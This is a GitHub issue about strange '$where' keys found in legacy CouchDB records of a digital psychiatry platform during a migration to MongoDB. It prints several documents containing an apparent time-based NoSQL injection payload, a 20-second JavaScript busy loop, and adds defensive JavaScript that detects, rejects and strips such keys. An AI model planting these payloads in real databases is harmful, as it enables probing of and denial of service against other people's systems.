BIDMCDigitalPsychiatry / LAMP-platform

The LAMP Platform (issues and documentation).
https://docs.lamp.digital/

Strange document keys in legacy CouchDB data #768

Open avaidyam opened 11 months ago

avaidyam commented 11 months ago

From external collaborator:

I managed to get the migration script working. It’s really rough but it works. There is a problem with one of the databases. Are you using “$” symbols somewhere?

I don’t know about the “$” symbol problem and can’t think of anything immediately. [REDACTED], do you know if there would be “$” symbols in the data entered to mindLAMP?

So the problem lies in “activity_event”: there are entries with something like this one: '$where': "if(typeof rng42==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);rng42=1;}" It looks like activity_event defines questions for participants to answer, if that helps. Mongo doesn’t allow keys starting with “$”. It feels like someone is trying some inline JavaScript, which is clever but very naughty from a security standpoint. The sensor entries are very small. Each seems to hold a single sensor reading, so the fact that there are a lot of entries isn’t surprising, but, yes, 2.2B is a lot.

[...] this is in the database, not the code. It turns out there are 4 documents across 3 collections that have this.

Activity doc: qsswfmmaw1e4mp8y686n
Sensor doc: w3qrfv85xqkbz3wt8axc
Activity Event docs: 03a860854909b6b98bb919deeecd147f, ea1b0c4106318c05beb121501efc08c9

The Doc IDs probably don’t mean anything outside our instance though. I’ve dug all the documents out; 3 of them gave the same #parent (“dolor ut”), and they all have at least one instance of basically the same code fragment that’s causing problems, namely:

"$where": "if(typeof rng42==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);rng42=1;}"

Which appears to be a 20s busy loop in a MongoDB query. Each document’s copies of the fragment share the same 5-random-character variable (“rng42” in this case), and each document’s variable is different. A quick skim through the LAMP-server code shows that there’s no real data validation happening on the repository object. Objects are just passed directly.

Here’s the offending documents with their timestamps converted to AEDT and UTC for convenience:

// Sensor (Fri  4 Feb 2022 16:27:31 AEDT / Fri  4 Feb 2022 05:27:31 UTC):
{
  "_id": "w3qrfv85xqkbz3wt8axc",
  "_rev": "1-640979940c98069ee23927a3e4b362e2",
  "#parent": "dolor ut",
  "timestamp": 1643952451122,
  "spec": "lamp.accelerometer",
  "name": "Accelerometer",
  "settings": {
    "frequency": 5,
    "$where": "if(typeof uzs1i==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);uzs1i=1;}"
  }
}

// Activity (Fri  4 Feb 2022 16:26:41 AEDT / Fri  4 Feb 2022 05:26:41 UTC):
{
  "_id": "qsswfmmaw1e4mp8y686n",
  "_rev": "1-9ccbbf30e3b3bf20e9aea26073f3b47a",
  "#parent": "dolor ut",
  "timestamp": 1643952401879,
  "spec": "lamp.survey",
  "name": "Mood Survey",
  "settings": {
    "questions": [
      {
        "text": "What day is it today?",
        "description": "Please answer based on when you received the notification for this survey.",
        "type": "slider",
        "options": [
          "Sunday",
          "Monday",
          "Tuesday",
          "Wednesday",
          "Thursday",
          "Friday",
          "Saturday"
        ],
        "$where": "if(typeof gxz3a==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gxz3a=1;}"
      }
    ],
    "$where": "if(typeof gxz3a==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gxz3a=1;}"
  },
  "schedule": [
    {
      "start_date": "2020-10-24T14:17:00.000Z",
      "time": "2020-10-23T16:17:33.291Z",
      "repeat_interval": "every3h",
      "custom_time": [
        "2020-10-23T14:18:20.973Z",
        "2020-10-23T14:18:20.973Z",
        "2020-10-23T14:18:20.973Z",
        "2020-10-23T14:18:20.973Z"
      ],
      "$where": "if(typeof gxz3a==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);gxz3a=1;}"
    }
  ],
  "category": null
}

// Activity Event (Wed  9 Feb 2022 15:33:21 AEDT / Wed  9 Feb 2022 04:33:21 UTC):
{
  "_id": "ea1b0c4106318c05beb121501efc08c9",
  "_rev": "1-38bbd42a3b16e48eb77a5d7a55081eb7",
  "#parent": "U0671869565",
  "timestamp": 1644381201927,
  "duration": 0,
  "activity": "5vs16btbzbwzeg3m2r15",
  "static_data": {
    "$where": "if(typeof rng42==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);rng42=1;}"
  },
  "temporal_slices": [
    {
      "item": "abcd?",
      "value": "yesh",
      "type": null,
      "level": null,
      "duration": 7290,
      "$where": "if(typeof rng42==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);rng42=1;}"
    }
  ]
}

// Activity Event (Wed 11 Nov 2020 02:26:40 AEDT / Tue 10 Nov 2020 15:26:40 UTC):
{
  "_id": "03a860854909b6b98bb919deeecd147f",
  "_rev": "1-a1587118eceaed00bcead98a33f3f6d2",
  "#parent": "dolor ut",
  "timestamp": 1605022000000,
  "duration": 84123,
  "activity": "2wp97csc3g57ptznhhkg",
  "static_data": {
    "assistance_required": true,
    "mode": "expert",
    "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
  },
  "temporal_slices": [
    {
      "item": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "value": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "type": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "duration": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "level": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
    },
    {
      "item": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "value": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "type": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "duration": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "level": {
        "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
      },
      "$where": "if(typeof oaiy4==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);oaiy4=1;}"
    }
  ]
}

//cc FYI @ertjlane @michaelmenon
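The two things a maintainer needs here are a check on the write path (so a client cannot persist keys like `$where` through the repository layer in the first place) and a scanner for the legacy dump (so the migration can find every document that carries one). The block below is an added example, not code from LAMP-server or from the collaborator's migration script; the function names (`findOperatorKeys`, `assertSafeDocument`, `stripOperatorKeys`, `scanLegacyDocuments`) and the sample documents are made up for illustration, with ids and parents that do not come from any real instance. It treats any key starting with `$` or containing `.` as operator-style, which is broader than the single `$where` seen in the issue.

```javascript
// Added example (not LAMP-platform code). Detects MongoDB operator-style keys
// ("$where" as seen in the issue, and by extension any "$"-prefixed or dotted key)
// in untrusted JSON, so a write path can reject them and a migration can locate them.

/**
 * Recursively collect the paths of every object key MongoDB treats specially:
 * keys beginning with "$" (query operators such as $where) or containing "."
 * (field-path separators). Arrays are descended with [index] in the path.
 */
function findOperatorKeys(value, path = "", out = []) {
  if (Array.isArray(value)) {
    value.forEach((item, i) => findOperatorKeys(item, `${path}[${i}]`, out));
  } else if (value !== null && typeof value === "object") {
    for (const [key, child] of Object.entries(value)) {
      const here = path ? `${path}.${key}` : key;
      if (key.startsWith("$") || key.includes(".")) out.push(here);
      findOperatorKeys(child, here, out);
    }
  }
  return out;
}

/**
 * Validation for the write path: throw instead of persisting a document that
 * carries operator-style keys. The error lists every offending path so the
 * rejection is debuggable from server logs. Returns the document when clean.
 */
function assertSafeDocument(doc) {
  const bad = findOperatorKeys(doc);
  if (bad.length > 0) {
    throw new Error(`rejected document: operator-style keys at ${bad.join(", ")}`);
  }
  return doc;
}

/**
 * Cleaning for legacy data: deep-copy a document with every operator-style key
 * dropped. A value that consisted only of such keys becomes {} (see usage note).
 */
function stripOperatorKeys(value) {
  if (Array.isArray(value)) return value.map(stripOperatorKeys);
  if (value !== null && typeof value === "object") {
    const clean = {};
    for (const [key, child] of Object.entries(value)) {
      if (key.startsWith("$") || key.includes(".")) continue;
      clean[key] = stripOperatorKeys(child);
    }
    return clean;
  }
  return value;
}

/** Migration helper: map each document _id to its offending paths; clean docs are omitted. */
function scanLegacyDocuments(docs) {
  const report = {};
  for (const doc of docs) {
    const bad = findOperatorKeys(doc);
    if (bad.length > 0) report[doc._id] = bad;
  }
  return report;
}

// Constructed sample documents shaped like the sensor and activity-event records in
// the issue; ids, parents, timestamps and the variable name are made up.
const BUSY_LOOP =
  "if(typeof x1y2z==='undefined'){var a=new Date();do{var b=new Date();}while(b-a<20000);x1y2z=1;}";
const SAMPLE_SENSOR = {
  _id: "sample-sensor",
  "#parent": "sample-parent",
  timestamp: 0,
  spec: "lamp.accelerometer",
  settings: { frequency: 5, $where: BUSY_LOOP },
};
const SAMPLE_EVENT = {
  _id: "sample-event",
  "#parent": "sample-parent",
  timestamp: 0,
  static_data: { $where: BUSY_LOOP },
  temporal_slices: [{ item: { $where: BUSY_LOOP }, duration: 1 }],
};
const CLEAN_EVENT = { _id: "clean-event", static_data: {}, temporal_slices: [] };

// Scan a constructed "dump" the way a migration would, then print the findings.
const REPORT = scanLegacyDocuments([SAMPLE_SENSOR, SAMPLE_EVENT, CLEAN_EVENT]);
console.log(JSON.stringify(REPORT, null, 2));
```

`assertSafeDocument` is the check that belongs in the repository layer the collaborator describes as passing objects straight through; rejecting is preferable to stripping on the live write path, because silently dropping keys hides the fact that a client is sending them. `stripOperatorKeys` is only for cleaning the legacy dump, and it has a sharp edge visible in the second activity event above: when a slice's `item`, `value`, `type` and so on were nothing but the injected fragment, stripping leaves `{}` in their place, so a migration should log those ids from `scanLegacyDocuments` and decide per document whether an empty slice is acceptable.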